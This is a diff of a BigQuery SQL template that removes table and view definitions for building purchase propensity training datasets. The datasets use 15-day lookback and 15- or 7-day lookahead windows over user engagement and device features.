a/sql/procedure/purchase_propensity_training_preparation.sqlx +++ b/sql/procedure/purchase_propensity_training_preparation.sqlx @@ -662,929 +662,8 @@ CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` ); - --- This is a table preparing rows for purchase propensity modelling looking back 15 days and looking ahead 15 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training_15_15` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - -- Calculate the will purchase label. - -- Label for a purchase propensity model. It indicates whether a user made a purchase within the next 15 days based on their purchase history. - -- This label is then used to train a model that can predict the likelihood of future purchases for other users. - LAST_VALUE(CASE WHEN ( - purchase_day_1+ - purchase_day_2+ - purchase_day_3+ - purchase_day_4+ - purchase_day_5+ - purchase_day_6+ - purchase_day_7+ - purchase_day_8+ - purchase_day_9+ - purchase_day_10+ - purchase_day_11+ - purchase_day_12+ - purchase_day_13+ - purchase_day_14) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_purchase - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` -); - --- This is a table preparing rows for purchase propensity modelling looking back 15 days and looking ahead 7 days. -CREATE OR REPLACE TABLE `{{project_id}}.{{dataset}}.purchase_propensity_training_15_7` AS( - SELECT DISTINCT - CURRENT_TIMESTAMP() AS processed_timestamp, - data_split, - feature_date, - user_pseudo_id, - LAST_VALUE(user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_id, - LAST_VALUE(user_ltv_revenue) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS user_ltv_revenue, - LAST_VALUE(device_category) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_category, - LAST_VALUE(device_mobile_brand_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_brand_name, - LAST_VALUE(device_mobile_model_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_mobile_model_name, - LAST_VALUE(device_os) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_os, - LAST_VALUE(device_language) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_language, - LAST_VALUE(device_web_browser) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS device_web_browser, - LAST_VALUE(geo_sub_continent) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_sub_continent, - LAST_VALUE(geo_country) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_country, - LAST_VALUE(geo_region) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_region, - LAST_VALUE(geo_city) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_city, - LAST_VALUE(geo_metro) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS geo_metro, - LAST_VALUE(last_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_medium, - LAST_VALUE(last_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_name, - LAST_VALUE(last_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS last_traffic_source_source, - LAST_VALUE(first_traffic_source_medium) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_medium, - LAST_VALUE(first_traffic_source_name) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_name, - LAST_VALUE(first_traffic_source_source) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS first_traffic_source_source, - LAST_VALUE(has_signed_in_with_user_id) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS has_signed_in_with_user_id, - LAST_VALUE(active_users_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_1_day, - LAST_VALUE(active_users_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_2_day, - LAST_VALUE(active_users_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_3_day, - LAST_VALUE(active_users_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_4_day, - LAST_VALUE(active_users_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_5_day, - LAST_VALUE(active_users_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_6_day, - LAST_VALUE(active_users_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_7_day, - LAST_VALUE(active_users_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS active_users_past_8_14_day, - LAST_VALUE(purchases_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_1_day, - LAST_VALUE(purchases_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_2_day, - LAST_VALUE(purchases_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_3_day, - LAST_VALUE(purchases_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_4_day, - LAST_VALUE(purchases_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_5_day, - LAST_VALUE(purchases_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_6_day, - LAST_VALUE(purchases_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_7_day, - LAST_VALUE(purchases_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS purchases_past_8_14_day, - LAST_VALUE(visits_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_1_day, - LAST_VALUE(visits_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_2_day, - LAST_VALUE(visits_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_3_day, - LAST_VALUE(visits_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_4_day, - LAST_VALUE(visits_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_5_day, - LAST_VALUE(visits_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_6_day, - LAST_VALUE(visits_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_7_day, - LAST_VALUE(visits_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS visits_past_8_14_day, - LAST_VALUE(view_items_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_1_day, - LAST_VALUE(view_items_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_2_day, - LAST_VALUE(view_items_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_3_day, - LAST_VALUE(view_items_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_4_day, - LAST_VALUE(view_items_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_5_day, - LAST_VALUE(view_items_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_6_day, - LAST_VALUE(view_items_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_7_day, - LAST_VALUE(view_items_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS view_items_past_8_14_day, - LAST_VALUE(add_to_carts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_1_day, - LAST_VALUE(add_to_carts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_2_day, - LAST_VALUE(add_to_carts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_3_day, - LAST_VALUE(add_to_carts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_4_day, - LAST_VALUE(add_to_carts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_5_day, - LAST_VALUE(add_to_carts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_6_day, - LAST_VALUE(add_to_carts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_7_day, - LAST_VALUE(add_to_carts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS add_to_carts_past_8_14_day, - LAST_VALUE(checkouts_past_1_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_1_day, - LAST_VALUE(checkouts_past_2_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_2_day, - LAST_VALUE(checkouts_past_3_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_3_day, - LAST_VALUE(checkouts_past_4_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_4_day, - LAST_VALUE(checkouts_past_5_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_5_day, - LAST_VALUE(checkouts_past_6_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_6_day, - LAST_VALUE(checkouts_past_7_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_7_day, - LAST_VALUE(checkouts_past_8_14_day) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) AS checkouts_past_8_14_day, - -- Calculate the will purchase label. - -- Label for a purchase propensity model. It indicates whether a user made a purchase within the next 7 days based on their purchase history. - -- This label is then used to train a model that can predict the likelihood of future purchases for other users. - LAST_VALUE(CASE WHEN ( - purchase_day_1+ - purchase_day_2+ - purchase_day_3+ - purchase_day_4+ - purchase_day_5+ - purchase_day_6+ - purchase_day_7) = 0 THEN 0 ELSE 1 END) OVER(PARTITION BY user_pseudo_id, feature_date ORDER BY feature_date DESC) as will_purchase - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_full_dataset` -); - --- This is a view preparing rows for purchase propensity modelling looking back 15 days and looking ahead 15 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_15_15` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_15_15", - description="View Purchase Propensity Training dataset using 15 days back to predict 15 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase -FROM( -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_15_15` -) -WHERE - user_row_order = 1; - - --- This is a view preparing rows for purchase propensity modelling looking back 15 days and looking ahead 7 days. -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_15_7` -( - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - will_purchase - ) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_15_7", - description="View Purchase Propensity Training dataset using 15 days back to predict 7 days ahead. View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - checkouts_past_1_day, - 